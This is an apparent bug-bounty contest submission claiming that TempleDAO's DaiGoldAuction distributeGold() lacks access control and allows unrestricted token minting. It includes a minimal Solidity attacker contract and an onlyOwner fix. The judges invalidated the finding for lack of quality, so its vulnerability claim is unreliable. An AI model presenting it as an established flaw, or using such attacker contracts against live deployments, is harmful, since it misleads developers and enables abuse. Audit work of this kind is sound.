TempleGold

TempleDAO
Foundry
25,000 USDC
Submission Details
Severity: medium
Invalid

Unrestricted Access to Minting to external function `DaiGoldAuction.sol::distributeGold()`

Summary:

The distributeGold function calls the mint function from the TempleGold contract without proper access control checks. This allows any contract or external account to call distributeGold, leading to unrestricted minting of tokens.

Severity Level: High-Medium

Impact:

  • Inflation: Unlimited tokens can be minted, leading to devaluation.
  • Loss of Trust: Token holders may lose trust in the project.
  • Economic Exploitation: The attacker could flood the market with newly minted tokens, causing a price crash.

Proof of Concept:

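```solidity
pragma solidity ^0.8.0;

// Minimal interface for the target; "ContractA" is the submission's placeholder name
interface ContractA {
    function distributeGold() external;
}

// Attacker contract
contract Attacker {
    ContractA public contractA;
    constructor(address _contractA) {
        contractA = ContractA(_contractA);
    }
    // Forwards a call to distributeGold() on the target
    function attack() external {
        contractA.distributeGold();
    }
}
```

  • Deploy the Attacker contract, passing the address of ContractA, and call the attack function. This will mint new tokens without any restriction.

  • Anyone can call the distributeGold function, which can mint tokens.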

Tools Used:

Manual, Foundry

Recommendations:

Implement access control using the onlyOwner modifier or similar to restrict access to the distributeGold function.

```solidity
function distributeGold() external onlyOwner {
    TempleGold.mint();
}
```

Updates

Lead Judging Commences

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality

Appeal created

0xdhanraj30 Submitter
11 months ago
inallhonesty Lead Judge
10 months ago
inallhonesty Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality
